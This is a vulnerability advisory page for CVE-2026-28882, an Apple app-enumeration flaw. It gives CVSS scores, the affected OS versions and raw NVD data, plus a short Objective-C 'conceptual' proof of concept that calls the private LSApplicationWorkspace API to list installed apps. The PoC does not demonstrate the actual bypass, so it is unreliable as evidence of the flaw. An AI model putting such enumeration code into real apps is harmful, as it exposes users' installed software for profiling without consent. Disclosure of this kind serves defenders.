Security Vulnerability Report
CVE-2026-28882 CVSS 4.0 MEDIUM

Published: 2026-03-25 01:17:12
Last Modified: 2026-05-11 21:18:53

Description

This issue was addressed with improved checks. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, tvOS 26.4, visionOS 26.4, watchOS 26.4. An app may be able to enumerate a user's installed apps.

CVSS Details

CVSS Score: 4.0
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE
iOS < 18.7.9
iOS < 26.4
iPadOS < 18.7.9
iPadOS < 26.4
macOS Tahoe < 26.4
tvOS < 26.4
visionOS < 26.4
watchOS < 26.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
objective-c
/*
 * Conceptual Proof of Concept (PoC) for CVE-2026-28882
 * This snippet demonstrates how an app might enumerate installed apps
 * using private APIs if the security checks are bypassed.
 * WARNING: This is for educational purposes only.
 */
#import <Foundation/Foundation.h>

@interface LSApplicationWorkspace : NSObject
+ (id)defaultWorkspace;
- (NSArray *)allInstalledApplications;
@end

@interface LSApplicationProxy : NSObject
@property (nonatomic, readonly) NSString *bundleIdentifier;
@property (nonatomic, readonly) NSString *localizedName;
@end

int main(int argc, char * argv[]) {
    @autoreleasepool {
        // Access the private LSApplicationWorkspace class
        Class workspaceClass = NSClassFromString(@"LSApplicationWorkspace");
        if (workspaceClass) {
            id workspace = [workspaceClass performSelector:@selector(defaultWorkspace)];
            if (workspace) {
                // Retrieve the list of all installed applications
                NSArray *apps = [workspace performSelector:@selector(allInstalledApplications)];
                NSLog(@"[PoC] Found %lu installed applications:", (unsigned long)apps.count);
                for (id app in apps) {
                    NSString *bundleID = [app performSelector:@selector(bundleIdentifier)];
                    NSString *name = [app performSelector:@selector(localizedName)];
                    NSLog(@"App: %@ | Bundle ID: %@", name, bundleID);
                }
            }
        } else {
            NSLog(@"[PoC] Failed to access LSApplicationWorkspace.");
        }
    }
    return 0;
}

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-28882", "sourceIdentifier": "[email protected]", "published": "2026-03-25T01:17:12.057", "lastModified": "2026-05-11T21:18:52.537", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with improved checks. This issue is fixed in iOS 18.7.9 and iPadOS 18.7.9, iOS 26.4 and iPadOS 26.4, macOS Tahoe 26.4, tvOS 26.4, visionOS 26.4, watchOS 26.4. An app may be able to enumerate a user's installed apps."}, {"lang": "es", "value": "Este problema se abordó con comprobaciones mejoradas. Este problema está solucionado en iOS 26.4 y iPadOS 26.4, macOS Tahoe 26.4, tvOS 26.4, visionOS 26.4, watchOS 26.4. Una aplicación podría ser capaz de enumerar las aplicaciones instaladas de un usuario."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.0, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.5, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "F813DB63-2B55-4E0B-9073-5465C65F69D6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "01612D13-BE5B-43F8-B53E-5BF57F2A5B0C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "DCFD15D9-91CA-4342-9F7E-A219B459B755"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "A906E2B7-B83B-4AD0-B00F-BEDEF2EDB844"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "113B9705-BFF0-4357-B1AB-F57052F32361"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.4", "matchCriteriaId": "F6EAF0A5-7CFF-4EF6-9BC7-DB25B213F753"}]}]}], "references": [{"url": "https://support.apple.com/en-us/126792", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126794", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126797", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126798", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/126799", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/127111", "source": "[email protected]"}]}}